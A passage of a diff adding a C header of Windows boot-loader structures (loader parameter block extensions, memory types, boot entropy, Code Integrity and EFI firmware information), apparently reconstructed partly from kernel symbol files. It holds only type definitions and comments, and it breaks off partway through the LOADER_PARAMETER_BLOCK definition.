KeyboardPeripheral, + TerminalPeripheral, + OtherPeripheral, + LinePeripheral, + NetworkPeripheral, + SystemMemory, + DockingInformation, + RealModeIrqRoutingTable, + RealModePCIEnumeration, + MaximumType +} CONFIGURATION_TYPE, *PCONFIGURATION_TYPE; + +// +// Profile information stored in the registry, read from cmboot, and presented +// to the loader. +// +#define HW_PROFILE_STATUS_SUCCESS 0x0000 +#define HW_PROFILE_STATUS_ALIAS_MATCH 0x0001 +#define HW_PROFILE_STATUS_TRUE_MATCH 0x0002 +#define HW_PROFILE_STATUS_PRISTINE_MATCH 0x0003 +#define HW_PROFILE_STATUS_FAILURE 0xC001 + +// +// Docking States for the given profile +// +#define HW_PROFILE_DOCKSTATE_UNSUPPORTED (0x0) +#define HW_PROFILE_DOCKSTATE_UNDOCKED (0x1) +#define HW_PROFILE_DOCKSTATE_DOCKED (0x2) +#define HW_PROFILE_DOCKSTATE_UNKNOWN (0x3) +#define HW_PROFILE_DOCKSTATE_USER_SUPPLIED (0x4) +#define HW_PROFILE_DOCKSTATE_USER_UNDOCKED \ + (HW_PROFILE_DOCKSTATE_USER_SUPPLIED | HW_PROFILE_DOCKSTATE_UNDOCKED) +#define HW_PROFILE_DOCKSTATE_USER_DOCKED \ + (HW_PROFILE_DOCKSTATE_USER_SUPPLIED | HW_PROFILE_DOCKSTATE_DOCKED) + +// +// Capabilites of the given profile +// +#define HW_PROFILE_CAPS_VCR 0x0001 // As apposed to Surprize +#define HW_PROFILE_CAPS_DOCKING_WARM 0x0002 +#define HW_PROFILE_CAPS_DOCKING_HOT 0x0004 +#define HW_PROFILE_CAPS_RESERVED 0xFFF8 + +// +// Extension structure to the LOADER_PARAMETER_BLOCK in arc.h +// +typedef struct _PROFILE_PARAMETER_BLOCK { + UINT16 Status; + UINT16 Reserved; + UINT16 DockingState; + UINT16 Capabilities; + UINT32 DockID; + UINT32 SerialNumber; +} PROFILE_PARAMETER_BLOCK; + +// +// Block to communcation the current ACPI docking state +// +typedef struct _PROFILE_ACPI_DOCKING_STATE { + UINT16 DockingState; + UINT16 SerialLength; + CHAR16 SerialNumber[1]; +} PROFILE_ACPI_DOCKING_STATE, *PPROFILE_ACPI_DOCKING_STATE; + +// +// Define ARC_STATUS type. +// +typedef UINT32 ARC_STATUS; + +// +// Define configuration routine types. +// +// Configuration information. +// +typedef enum _CONFIGURATION_CLASS { + SystemClass, + ProcessorClass, + CacheClass, + AdapterClass, + ControllerClass, + PeripheralClass, + MemoryClass, + MaximumClass +} CONFIGURATION_CLASS, *PCONFIGURATION_CLASS; + +// +// Define DEVICE_FLAGS +// +typedef struct _DEVICE_FLAGS { + UINT32 Failed : 1; + UINT32 ReadOnly : 1; + UINT32 Removable : 1; + UINT32 ConsoleIn : 1; + UINT32 ConsoleOut : 1; + UINT32 Input : 1; + UINT32 Output : 1; +} DEVICE_FLAGS, *PDEVICE_FLAGS; + +typedef struct _CONFIGURATION_COMPONENT { + CONFIGURATION_CLASS Class; + CONFIGURATION_TYPE Type; + DEVICE_FLAGS Flags; + UINT16 Version; + UINT16 Revision; + UINT32 Key; + union { + UINT32 AffinityMask; + struct { + UINT16 Group; + UINT16 GroupIndex; + } s; + } u; + UINT32 ConfigurationDataLength; + UINT32 IdentifierLength; + CHAR8* Identifier; +} CONFIGURATION_COMPONENT, *PCONFIGURATION_COMPONENT; + +// +// Define configuration data structure used in all systems. +// +typedef struct _CONFIGURATION_COMPONENT_DATA { + struct _CONFIGURATION_COMPONENT_DATA *Parent; + struct _CONFIGURATION_COMPONENT_DATA *Child; + struct _CONFIGURATION_COMPONENT_DATA *Sibling; + CONFIGURATION_COMPONENT ComponentEntry; + VOID* ConfigurationData; +} CONFIGURATION_COMPONENT_DATA, *PCONFIGURATION_COMPONENT_DATA; + +// +// Define memory allocation structures used in all systems. +// +typedef enum _TYPE_OF_MEMORY { + LoaderExceptionBlock, // 0 + LoaderSystemBlock, // 1 + LoaderFree, // 2 + LoaderBad, // 3 + LoaderLoadedProgram, // 4 + LoaderFirmwareTemporary, // 5 + LoaderFirmwarePermanent, // 6 + LoaderOsloaderHeap, // 7 + LoaderOsloaderStack, // 8 + LoaderSystemCode, // 9 + LoaderHalCode, // a + LoaderBootDriver, // b + LoaderConsoleInDriver, // c + LoaderConsoleOutDriver, // d + LoaderStartupDpcStack, // e + LoaderStartupKernelStack, // f + LoaderStartupPanicStack, // 10 + LoaderStartupPcrPage, // 11 + LoaderStartupPdrPage, // 12 + LoaderRegistryData, // 13 + LoaderMemoryData, // 14 + LoaderNlsData, // 15 + LoaderSpecialMemory, // 16 + LoaderBBTMemory, // 17 + LoaderZero, // 18 + LoaderXIPRom, // 19 + LoaderHALCachedMemory, // 1a + LoaderLargePageFiller, // 1b + LoaderErrorLogMemory, // 1c + LoaderVsmMemory, // 1d + LoaderFirmwareCode, // 1e + LoaderFirmwareData, // 1f + LoaderFirmwareReserved, // 20 + LoaderEnclaveMemory, // 21 + LoaderFirmwareKsr, // 22 + LoaderEnclaveKsr, // 23 + LoaderSkMemory, // 24 + LoaderMaximum // 25 +} TYPE_OF_MEMORY; + +typedef struct _MEMORY_ALLOCATION_DESCRIPTOR { + LIST_ENTRY ListEntry; + TYPE_OF_MEMORY MemoryType; + UINTN BasePage; + UINTN PageCount; +} MEMORY_ALLOCATION_DESCRIPTOR, *PMEMORY_ALLOCATION_DESCRIPTOR; + +// +// Define loader parameter block structure. +// +typedef struct _NLS_DATA_BLOCK { + VOID* AnsiCodePageData; + VOID* OemCodePageData; + VOID* UnicodeCaseTableData; +} NLS_DATA_BLOCK, *PNLS_DATA_BLOCK; + +typedef struct _VHD_DISK_SIGNATURE { + UINT32 ParentPartitionNumber; + UINT8 BootDevice[ANYSIZE_ARRAY]; +} VHD_DISK_SIGNATURE, *PVHD_DISK_SIGNATURE; + +typedef struct _ARC_DISK_SIGNATURE { + LIST_ENTRY ListEntry; + UINT32 Signature; + CHAR8* ArcName; + UINT32 CheckSum; + BOOLEAN ValidPartitionTable; + BOOLEAN xInt13; + BOOLEAN IsGpt; + UINT8 Reserved; + UINT8 GptSignature[16]; + PVHD_DISK_SIGNATURE VhdSignature; +} ARC_DISK_SIGNATURE, *PARC_DISK_SIGNATURE; + +typedef struct _ARC_DISK_INFORMATION { + LIST_ENTRY DiskSignatures; +} ARC_DISK_INFORMATION, *PARC_DISK_INFORMATION; + +typedef struct _I386_LOADER_BLOCK { + +#if defined(_X86_) || defined(_AMD64_) + VOID* CommonDataArea; + UINT32 MachineType; // Temporary only + UINT32 VirtualBias; +#else + UINT32 PlaceHolder; +#endif + +} I386_LOADER_BLOCK, *PI386_LOADER_BLOCK; + +typedef struct _ARM_LOADER_BLOCK { + +#if defined(_ARM_) || defined(_ARM64_) + UINTN VirtualBias; + VOID* KdCpuBuffer; +#else + UINT32 PlaceHolder; +#endif + +} ARM_LOADER_BLOCK, *PARM_LOADER_BLOCK; + +#define NUMBER_OF_LOADER_TR_ENTRIES 8 + +typedef struct _LOADER_PERFORMANCE_DATA { + UINT64 StartTime; + UINT64 EndTime; + + // + // Below added in 10.0.17763.0 + // + UINT64 PreloadEndTime; + UINT64 TcbLoaderStartTime; + UINT64 LoadHypervisorTime; + UINT64 LaunchHypervisorTime; + UINT64 LoadVsmTime; + UINT64 LaunchVsmTime; + UINT64 LoadDriversTime; +} LOADER_PERFORMANCE_DATA, *PLOADER_PERFORMANCE_DATA; + +// +// Entropy result codes and source IDs +// for Boot entropy sources are defined both in arc.h and +// ntexapi.h. These two copies must be kept identical. +// +typedef enum _BOOT_ENTROPY_SOURCE_RESULT_CODE { + BootEntropySourceStructureUninitialized = 0, + BootEntropySourceDisabledByPolicy = 1, + BootEntropySourceNotPresent = 2, + BootEntropySourceError = 3, + BootEntropySourceSuccess = 4, +} BOOT_ENTROPY_SOURCE_RESULT_CODE, *PBOOT_ENTROPY_SOURCE_RESULT_CODE; + +typedef enum _BOOT_ENTROPY_SOURCE_ID { + BootEntropySourceNone = 0, + BootEntropySourceSeedfile = 1, + BootEntropySourceExternal = 2, + BootEntropySourceTpm = 3, + BootEntropySourceRdrand = 4, + BootEntropySourceTime = 5, + BootEntropySourceAcpiOem0 = 6, + BootEntropySourceUefi = 7, + BootEntropySourceCng = 8, + BootEntropySourceTcbTpm = 9, + BootEntropySourceTcbRdrand = 10, + BootMaxEntropySources = 10, +} BOOT_ENTROPY_SOURCE_ID; + +// +// The SORTPP tool can't handle array sizes expressed in terms of enums +// This hack can be removed when the tool is fixed +// +#define BootMaxEntropySources (10) + +#define BOOT_ENTROPY_SOURCE_DATA_SIZE (64) +#define BOOT_RNG_BYTES_FOR_NTOSKRNL (1024) +#define BOOT_SEED_BYTES_FOR_CNG (48) + +// +// The boot environment uses the following bytes from the ntoskrnl RNG data +// region. The kernel should consider the first +// BOOT_BL_NTOSKRNL_RNG_BYTES_USED bytes already consumed. +// +#define BOOT_BL_NTOSKRNL_RNG_BYTES_USED (55 * sizeof(UINT32)) + +// +// Boot entropy information +// This is the data that Boot passes to NT that contains the +// entropy & RNG information. +// These are the Boot versions of these structures. +// The name contains the string 'LDR' to distinguish it from the +// OS loader equivalents in ntexapi_h.w +// +typedef struct _BOOT_ENTROPY_SOURCE_LDR_RESULT { + BOOT_ENTROPY_SOURCE_ID SourceId; + UINT64 Policy; + BOOT_ENTROPY_SOURCE_RESULT_CODE ResultCode; + NTSTATUS ResultStatus; + UINT64 Time; // in BlArchGetPerformanceCounter() units + UINT32 EntropyLength; + UINT8 EntropyData[BOOT_ENTROPY_SOURCE_DATA_SIZE]; +} BOOT_ENTROPY_SOURCE_LDR_RESULT, *PBOOT_ENTROPY_SOURCE_LDR_RESULT; + +// +// EFI Offline crashdump configuration table definition. +// +#define OFFLINE_CRASHDUMP_VERSION_1 1 +#define OFFLINE_CRASHDUMP_VERSION_2 2 +#define OFFLINE_CRASHDUMP_VERSION_MAX OFFLINE_CRASHDUMP_VERSION_2 + +typedef struct _OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 { + UINT32 Version; + UINT32 AbnormalResetOccurred; + UINT32 OfflineMemoryDumpCapable; + + // + // Version_2 additional members. + // + PHYSICAL_ADDRESS ResetDataAddress; + UINT32 ResetDataSize; +} OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2, *POFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2; + +// +// Original first version definition. Now only used in winload.efi when interfacing with firmware, and in +// sysinfo.c when interfacing with higher level sw above the kernel, to maintain backward compatibility. +// +typedef struct _OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V1 { + UINT32 Version; + UINT32 AbnormalResetOccurred; + UINT32 OfflineMemoryDumpCapable; +} OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V1, *POFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V1; + +typedef OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 OFFLINE_CRASHDUMP_CONFIGURATION_TABLE; +typedef POFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2 POFFLINE_CRASHDUMP_CONFIGURATION_TABLE; + +// +// The constant BootMaxEntropySources is defined both in arc.w and ntexapi_h.w. +// If these ever get out of sync, different components will disagree on the value, +// and thus on the size of the array below. +// To help detect this type of bug we add a field with this constant so that the +// CHKed builds can assert on it. +// +typedef struct _BOOT_ENTROPY_LDR_RESULT { + UINT32 maxEntropySources; + BOOT_ENTROPY_SOURCE_LDR_RESULT EntropySourceResult[BootMaxEntropySources]; + UINT8 SeedBytesForCng[BOOT_SEED_BYTES_FOR_CNG]; + UINT8 RngBytesForNtoskrnl[BOOT_RNG_BYTES_FOR_NTOSKRNL]; + + // + // This field was added in an unknown Windows 10 revision after 10.0.10586.0 + // + UINT8 KdEntropy[32]; +} BOOT_ENTROPY_LDR_RESULT, *PBOOT_ENTROPY_LDR_RESULT; + +// +// Hypervisor specific loader parameters. +// +typedef struct _LOADER_PARAMETER_HYPERVISOR_EXTENSION { + + // + // Hypervisor crashdump pages if present. + // + UINT32 InitialHypervisorCrashdumpAreaPageCount; + UINT32 HypervisorCrashdumpAreaPageCount; + UINT64 InitialHypervisorCrashdumpAreaSpa; + UINT64 HypervisorCrashdumpAreaSpa; + + // + // Hypervisor launch status. + // + UINT64 HypervisorLaunchStatus; + UINT64 HypervisorLaunchStatusArg1; + UINT64 HypervisorLaunchStatusArg2; + UINT64 HypervisorLaunchStatusArg3; + UINT64 HypervisorLaunchStatusArg4; + +} LOADER_PARAMETER_HYPERVISOR_EXTENSION, *PLOADER_PARAMETER_HYPERVISOR_EXTENSION; + +// +// Code Integrity specific loader parameters. +// +typedef struct _LOADER_PARAMETER_CI_EXTENSION +{ + UINT32 CodeIntegrityOptions; + struct { + UINT32 UpgradeInProgress : 1; + UINT32 IsWinPE : 1; + UINT32 CustomKernelSignersAllowed : 1; + UINT32 Reserved : 29; + } s; + LARGE_INTEGER WhqlEnforcementDate; + UINT32 RevocationListOffset; + UINT32 RevocationListSize; + UINT32 CodeIntegrityPolicyOffset; + UINT32 CodeIntegrityPolicySize; + UINT32 CodeIntegrityPolicyHashOffset; + UINT32 CodeIntegrityPolicyHashSize; + UINT32 CodeIntegrityPolicyOriginalHashOffset; + UINT32 CodeIntegrityPolicyOriginalHashSize; + INT32 WeakCryptoPolicyLoadStatus; + UINT32 WeakCryptoPolicyOffset; + UINT32 WeakCryptoPolicySize; + UINT32 SecureBootPolicyOffset; + UINT32 SecureBootPolicySize; + UINT32 Reserved2; + UINT8 SerializedData[ANYSIZE_ARRAY]; // RevocationListSize bytes +} LOADER_PARAMETER_CI_EXTENSION, *PLOADER_PARAMETER_CI_EXTENSION; + +typedef struct _HAL_EXTENSION_INSTANCE_ENTRY { + + // + // Link into HalExtensionInstanceList in HAL_EXTENSION_MODULE_ENTRY. + // + LIST_ENTRY ListEntry; + + // + // Offset from the start of the ACPI Core System Resource Table to + // the Resource Group associate with this instance. + // + UINT32 OffsetIntoCsrt; +} HAL_EXTENSION_INSTANCE_ENTRY, *PHAL_EXTENSION_INSTANCE_ENTRY; + +typedef struct _HAL_EXTENSION_MODULE_ENTRY { + + // + // Link into HalExtensionList in LOADER_PARAMETER_EXTENSION. + // + LIST_ENTRY ListEntry; + + // + // Pointer to the associated module entry on the LoadOrderListHead list. + // This keeps info on the module name and entry point, among other things. + // + VOID* HalExtensionInfo; + + // + // List of HAL_EXTENSION_INSTANCE_ENTRY structures tracking which Resource + // Groups this extension is installed on. + // + LIST_ENTRY HalExtensionInstanceList; + + // + // Name and load status of the HAL Extension for debugging purposes. + // + NTSTATUS ModuleLoadStatus; + CHAR8* ModuleName; + CHAR8* ModulePath; + +} HAL_EXTENSION_MODULE_ENTRY, *PHAL_EXTENSION_MODULE_ENTRY; + +typedef struct _LOADER_BUGCHECK_PARAMETERS { + + // + // Bugcheck parameters passed to the kernel. + // + UINT32 BugcheckCode; + UINTN BugcheckParameter1; + UINTN BugcheckParameter2; + UINTN BugcheckParameter3; + UINTN BugcheckParameter4; +} LOADER_BUGCHECK_PARAMETERS, *PLOADER_BUGCHECK_PARAMETERS; + +// +// Since 10.0.14393.0 +// +typedef struct _LEAP_SECOND_DATA { + UINT8 Enabled; + UINT32 Count; + LARGE_INTEGER Data[1]; +} LEAP_SECOND_DATA, *PLEAP_SECOND_DATA; + +// +// Since 10.0.15063.0 +// +typedef struct _LOADER_RESET_REASON { + UINT8 Supplied; + union { + struct { + UINT64 Pch : 1; + UINT64 EmbeddedController : 1; + UINT64 Reserved : 6; + } Component; + UINT64 AsULONG64; + UINT8 AsBytes[8]; + } Basic; + UINT32 AdditionalInfo[8]; +} LOADER_RESET_REASON, *PLOADER_RESET_REASON; + +typedef struct _LOADER_HIVE_RECOVERY_INFO { + struct { + // + // 1 if the hive was recovered by the boot loader, 0 otherwise. + // + UINT32 Recovered : 1; + + // + // 1 if recovery from a legacy log file was performed, 0 otherwise. + // + UINT32 LegacyRecovery : 1; + + // + // 1 if this hive was loaded as part of a soft reboot and encountered + // a sharing violation during the load (causing it to be loaded from + // a copy). 0 otherwise. + // + UINT32 SoftRebootConflict : 1; + + // + // The most recent log from which recovery was performed as an + // HFILE_TYPE. + // + // i.e. For legacy recovery the individual log file recovery was + // performed from, otherwise the log from which the highest + // sequence numbered entry was from. + // + UINT32 MostRecentLog : 3; + + UINT32 Spare : ((sizeof(UINT32) * 8) - 5); + } s; + + // + // The sequence number that should be used for the next log entry. + // + UINT32 LogNextSequence; + + // + // The minimum sequence number in the most recent log. + // + UINT32 LogMinimumSequence; + + // + // The file offset at which the next log entry should be written in the + // most recent log. + // + UINT32 LogCurrentOffset; +} LOADER_HIVE_RECOVERY_INFO, *PLOADER_HIVE_RECOVERY_INFO; + +// +// Internal boot flags definitions. +// +#define INTERNAL_BOOT_FLAGS_NONE 0x00000000 +#define INTERNAL_BOOT_FLAGS_UTC_BOOT_TIME 0x00000001 +#define INTERNAL_BOOT_FLAGS_RTC_BOOT_TIME 0x00000002 +#define INTERNAL_BOOT_FLAGS_NO_LEGACY_SERVICES 0x00000004 + +typedef struct _LOADER_PARAMETER_EXTENSION { + UINT32 Size; // set to sizeof (struct _LOADER_PARAMETER_EXTENSION) + PROFILE_PARAMETER_BLOCK Profile; + + // + // Errata Manager inf file. + // + VOID* EmInfFileImage; + UINT32 EmInfFileSize; + + // + // Pointer to the triage block, if present. + // + VOID* TriageDumpBlock; + + struct _HEADLESS_LOADER_BLOCK *HeadlessLoaderBlock; + + struct _SMBIOS3_TABLE_HEADER *SMBiosEPSHeader; + + VOID* DrvDBImage; // Database used to identify "broken" drivers. + UINT32 DrvDBSize; + + // If booting from the Network (PXE) then we will + // save the Network boot params in this loader block + struct _NETWORK_LOADER_BLOCK *NetworkLoaderBlock; + +#if defined(_X86_) + // + // Pointers to IRQL translation tables that reside in the HAL + // and are exposed to the kernel for use in the "inlined IRQL" + // build + // + UINT8* HalpIRQLToTPR; + UINT8* HalpVectorToIRQL; +#endif + + // + // Firmware Location + // + LIST_ENTRY FirmwareDescriptorListHead; + + // + // Pointer to the in-memory copy of override ACPI tables. The override + // table file is a simple binary file with one or more ACPI tables laid + // out one after another. + // + VOID* AcpiTable; + + // + // Size of override ACPI tables in bytes. + // + UINT32 AcpiTableSize; + + // + // Various informational flags passed to OS via OS Loader. + // + struct { + // + // Variables describing the success of the previous boot - whether + // booting into the OS was successful, and whether the arc from boot to + // runtime to shutdown was successful. Various types of system crashes + // will cause one or both of these to be FALSE. + // + UINT32 LastBootSucceeded : 1; + UINT32 LastBootShutdown : 1; + + // + // A flag indicating whether the platform supports access to IO ports. + // + UINT32 IoPortAccessSupported : 1; + + // + // A flag indicating whether or not the boot debugger persisted + // through kernel initialization. + // + UINT32 BootDebuggerActive : 1; + + // + // A flag indicating whether the system must enforce strong code + // guarantees. + // + UINT32 StrongCodeGuarantees : 1; + + // + // A flag indicating whether the system must enforce hard strong code + // guarantees. + // + UINT32 HardStrongCodeGuarantees : 1; + + // + // A flag indicating whether SID sharing disabled. + // + UINT32 SidSharingDisabled : 1; + + // + // A flag indicating whether TPM was intialized successfully or not + // by the OS loader during boot. + // + UINT32 TpmInitialized : 1; + + // + // A flag indicating whether the VSM code page has been configured and + // is usable. + // + UINT32 VsmConfigured : 1; + + // + // A flag indicating whether IUM is enabled. + // + UINT32 IumEnabled : 1; + + // + // A flag indicating whether we're booting from SMB + // + UINT32 IsSmbboot : 1; + + // + // Below added in 10.0.14393.0 + // + UINT32 BootLogEnabled : 1; + + // + // Below added in 10.0.17134.0 + // + UINT32 DriverVerifierEnabled : 1; + + UINT32 Unused : 8; + + UINT32 FeatureSimulations : 6; + + UINT32 MicrocodeSelfHosting : 1; + + UINT32 XhciLegacyHandoffSkip : 1; + + // + // Below added in 10.0.17763.0 + // + UINT32 DisableInsiderOptInHVCI : 1; + + UINT32 MicrocodeMinVerSupported : 1; + + UINT32 GpuIommuEnabled : 1; + } s; + + // + // Loader runtime performance data. + // + // This was a pointer to LOADER_PERFORMANCE_DATA until 10.0.17763.0 + // + LOADER_PERFORMANCE_DATA LoaderPerformanceData; + + // + // Boot application persistent data. + // + LIST_ENTRY BootApplicationPersistentData; + + // + // Windows Memory Diagnostic Test Results. + // + VOID* WmdTestResult; + + // + // Boot entry identifier. + // + GUID BootIdentifier; + + // + // The number of pages to reserve for the resume application to use as + // scratch space. This should correspond to the boot environment's memory + // footprint. + // + UINT32 ResumePages; + + // + // The crash dump header, if present. + // + VOID* DumpHeader; + + // + // Boot graphics context. + // + VOID* BgContext; + + // + // NUMA node locality information and group assignment data. + // + VOID* NumaLocalityInfo; + VOID* NumaGroupAssignment; + + // + // List of hives attached by loader + // + LIST_ENTRY AttachedHives; + + // + // Number of entries in the MemoryCachingRequirements map. + // + UINT32 MemoryCachingRequirementsCount; + + // + // List of MEMORY_CACHING_REQUIREMENTS for the system. + // + VOID* MemoryCachingRequirements; + + // + // Result of the Boot entropy gathering. + // + BOOT_ENTROPY_LDR_RESULT BootEntropyResult; + + // + // Computed ITC/TSC frequency of the BSP in hertz. + // + UINT64 ProcessorCounterFrequency; + + // + // Hypervisor specific information. + // + LOADER_PARAMETER_HYPERVISOR_EXTENSION HypervisorExtension; + + // + // Hardware configuration ID used to uniquelly identify the system. + // + GUID HardwareConfigurationId; + + // + // List of HAL_EXTENSION_MODULE_ENTRY structures. + // + LIST_ENTRY HalExtensionModuleList; + + // + // Contains most recent time from firmware, bootstat.dat and ntos build time. + // + LARGE_INTEGER SystemTime; + + // + // Contains cycle counter timestamp at the time SystemTime value was read. + // + UINT64 TimeStampAtSystemTimeRead; + + // + // Boot Flags that are passed to the SystemBootEnvironmentInformation class. + // + union { + UINT64 BootFlags; + struct { + UINT64 DbgMenuOsSelection : 1; + UINT64 DbgHiberBoot : 1; + UINT64 DbgSoftRestart : 1; + UINT64 DbgMeasuredLaunch : 1; + } s; + } u1; + + // + // Internal only flags that are passed to the kernel. + // + union { + UINT64 InternalBootFlags; + struct { + UINT64 DbgUtcBootTime : 1; + UINT64 DbgRtcBootTime : 1; + UINT64 DbgNoLegacyServices : 1; + } s; + } u2; + + // + // Pointer to the in-memory copy of the Wfs FP data. + // + VOID* WfsFPData; + + // + // Size of Wfs FP data in bytes. + // + UINT32 WfsFPDataSize; + + // + // Loader bugcheck parameters for the kernel or extensions to act upon + // + LOADER_BUGCHECK_PARAMETERS BugcheckParameters; + + // + // API set schema data. + // + VOID* ApiSetSchema; + UINT32 ApiSetSchemaSize; + LIST_ENTRY ApiSetSchemaExtensions; + + // + // The system's firmware version according to ACPI's FADT, + // SMBIOS's BIOS information table, and EFI's system table respectively. + // + UNICODE_STRING AcpiBiosVersion; + UNICODE_STRING SmbiosVersion; + UNICODE_STRING EfiVersion; + + // + // Debugger Descriptor + // + struct _DEBUG_DEVICE_DESCRIPTOR *KdDebugDevice; + + // + // EFI Offline crashdump configuration table. + // + OFFLINE_CRASHDUMP_CONFIGURATION_TABLE OfflineCrashdumpConfigurationTable; + + // + // Manufacturing mode profile name. + // + UNICODE_STRING ManufacturingProfile; + + // + // BBT Buffer to enable precise event based sampling. + // + VOID* BbtBuffer; + + // + // Registry values to be passed to the kernel for calculation of Xsave Buffer Size on Intel platforms + // +#if defined(_X86_) || defined (_AMD64_) + UINT64 XsaveAllowedFeatures; + UINT32 XsaveFlags; +#endif + + // + // Boot options used by the OS loader. + // + VOID* BootOptions; + + // + // These fields were added and/or moved forward in 10.0.17763.0 + // + UINT32 IumEnablement; + UINT32 IumPolicy; + INT32 IumStatus; + + // + // Boot sequence tracking for reliability reporting. + // + UINT32 BootId; + + // + // Code Integrity configuration. + // + PLOADER_PARAMETER_CI_EXTENSION CodeIntegrityData; + UINT32 CodeIntegrityDataSize; + + LOADER_HIVE_RECOVERY_INFO SystemHiveRecoveryInfo; + + // + // Below fields added in 10.0.14393.0 + // + UINT32 SoftRestartCount; + + INT64 SoftRestartTime; + + VOID* HypercallCodeVa; + + VOID* HalVirtualAddress; + + UINT64 HalNumberOfBytes; + + PLEAP_SECOND_DATA LeapSecondData; + + UINT32 MajorRelease; + + UINT32 Reserved1; + + // + // Below fields added in 10.0.15063.0 + // + CHAR8 NtBuildLab[224]; + + CHAR8 NtBuildLabEx[224]; + + LOADER_RESET_REASON ResetReason; + + // + // Below field added in 10.0.17134.0 + // + UINT32 MaxPciBusNumber; + + // + // Below field added in 10.0.17763.0 + // + UINT32 FeatureSettings; +} LOADER_PARAMETER_EXTENSION, *PLOADER_PARAMETER_EXTENSION; + +struct _HEADLESS_LOADER_BLOCK; +struct _SMBIOS_TABLE_HEADER; + +typedef struct _NETWORK_LOADER_BLOCK { + + // Binary contents of the entire DHCP Acknowledgment + // packet received by PXE. + UINT8* DHCPServerACK; + UINT32 DHCPServerACKLength; + + // Binary contents of the entire BINL Reply + // packet received by PXE. + UINT8* BootServerReplyPacket; + UINT32 BootServerReplyPacketLength; + +} NETWORK_LOADER_BLOCK, *PNETWORK_LOADER_BLOCK; + +typedef struct _VIRTUAL_EFI_RUNTIME_SERVICES { + + // + // (Virtual) Entry points to each of the EFI Runtime services. + // + UINTN GetTime; + UINTN SetTime; + UINTN GetWakeupTime; + UINTN SetWakeupTime; + UINTN SetVirtualAddressMap; + UINTN ConvertPointer; + UINTN GetVariable; + UINTN GetNextVariableName; + UINTN SetVariable; + UINTN GetNextHighMonotonicCount; + UINTN ResetSystem; + UINTN UpdateCapsule; + UINTN QueryCapsuleCapabilities; + UINTN QueryVariableInfo; + +} VIRTUAL_EFI_RUNTIME_SERVICES, *PVIRTUAL_EFI_RUNTIME_SERVICES; + +typedef struct _EFI_FIRMWARE_INFORMATION { + UINT32 FirmwareVersion; + PVIRTUAL_EFI_RUNTIME_SERVICES VirtualEfiRuntimeServices; + + // + // The return value from SetVirtualAddressMap call. + // + NTSTATUS SetVirtualAddressMapStatus; + + // + // Number of mappings missed if any due to change in firmware + // runtime memory map (for debugging). + // + UINT32 MissedMappingsCount; + + // + // The firmware resource list identifies firmware components that can + // be updated via WU. + // + LIST_ENTRY FirmwareResourceList; + + // + // The EFI memory map. + // + VOID* EfiMemoryMap; + UINT32 EfiMemoryMapSize; + UINT32 EfiMemoryMapDescriptorSize; + +} EFI_FIRMWARE_INFORMATION, *PEFI_FIRMWARE_INFORMATION; + +typedef struct _PCAT_FIRMWARE_INFORMATION { + UINT32 PlaceHolder; +} PCAT_FIRMWARE_INFORMATION, *PPCAT_FIRMWARE_INFORMATION; + +typedef struct _FIRMWARE_INFORMATION_LOADER_BLOCK { + struct { + // + // If set to TRUE, indicates that the system is running on EFI + // firmware. + // + UINT32 FirmwareTypeEfi: 1; + + // + // A flag indicating whether EFI runtime service calls must be routed + // through IUM. + // + UINT32 EfiRuntimeUseIum: 1; + + // + // A flag indicating whether EFI runtime code and data pages are + // separate and protected with RW or RX protections. + // + //UINT32 EfiRuntimePageProtectionEnabled: 1; // This was removed again in 10.0.14393.0 + + // + // A flag indicating whether the firmware supports code and data page + // separation with restricted protections. + // + UINT32 EfiRuntimePageProtectionSupported: 1; + +#if defined (_ARM64_) + // + // If set to TRUE, indicates that the system EFI was started in EL2 + // and therefore has something running there (hypervisor/microvisor). + // Also, this is where APs will start (EL2), and need to be directed + // to EL1 properly before they can start in the HLOS. + // + UINT32 FirmwareStartedInEL2: 1; + UINT32 Reserved: 28; +#else + UINT32 Reserved: 29; +#endif + } s; + + union { + EFI_FIRMWARE_INFORMATION EfiInformation; + PCAT_FIRMWARE_INFORMATION PcatInformation; + } u; + +} FIRMWARE_INFORMATION_LOADER_BLOCK, *PFIRMWARE_INFORMATION_LOADER_BLOCK; + +// +// I'd just like to interject for a moment... without this the next struct won't compile. +// Source: kernel PDBs once in a blue moon +// +typedef struct _KLDR_DATA_TABLE_ENTRY { + LIST_ENTRY InLoadOrderLinks; + VOID* ExceptionTable; + UINT32 ExceptionTableSize; + VOID* GpValue; + struct _NON_PAGED_DEBUG_INFO* NonPagedDebugInfo; + VOID* DllBase; + VOID* EntryPoint; + UINT32 SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + UINT32 Flags; + UINT16 LoadCount; + union { + struct { + UINT16 SignatureLevel : 4; + UINT16 SignatureType : 3; + UINT16 Unused : 9; + } s; + UINT16 EntireField; + } u; + VOID* SectionPointer; + UINT32 CheckSum; + UINT32 CoverageSectionSize; + VOID* CoverageSection; + VOID* LoadedImports; + VOID* Spare; + + // Below fields are Win 10+ only + UINT32 SizeOfImageNotRounded; + UINT32 TimeDateStamp; +} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY; + +// +// Boot loader data table entry. Each of the load lists in the parameter block +// consist of boot loader data table entries. +// +// N.B. This structure requires ntldr.h to have been included. +// +#define BLDR_FLAGS_CORE_DRIVER_DEPENDENT_DLL 0x00000001 +#define BLDR_FLAGS_CORE_EXTENSION_DEPENDENT_DLL 0x00000002 + +typedef struct _BLDR_DATA_TABLE_ENTRY { + KLDR_DATA_TABLE_ENTRY KldrEntry; + UNICODE_STRING CertificatePublisher; + UNICODE_STRING CertificateIssuer; + VOID* ImageHash; + VOID* CertificateThumbprint; + UINT32 ImageHashAlgorithm; + UINT32 ThumbprintHashAlgorithm; + UINT32 ImageHashLength; + UINT32 CertificateThumbprintLength; + UINT32 LoadInformation; + UINT32 Flags; +} BLDR_DATA_TABLE_ENTRY, *PBLDR_DATA_TABLE_ENTRY; + +#define OSLOADER_SECURITY_VERSION_CURRENT 1 + +typedef struct _LOADER_PARAMETER_BLOCK { + UINT32 OsMajorVersion; + UINT32 OsMinorVersion; + UINT32 Size; + UINT32 OsLoaderSecurityVersion; + LIST_ENTRY LoadOrderListHead; + LIST_ENTRY MemoryDescriptorListHead; + + // + // 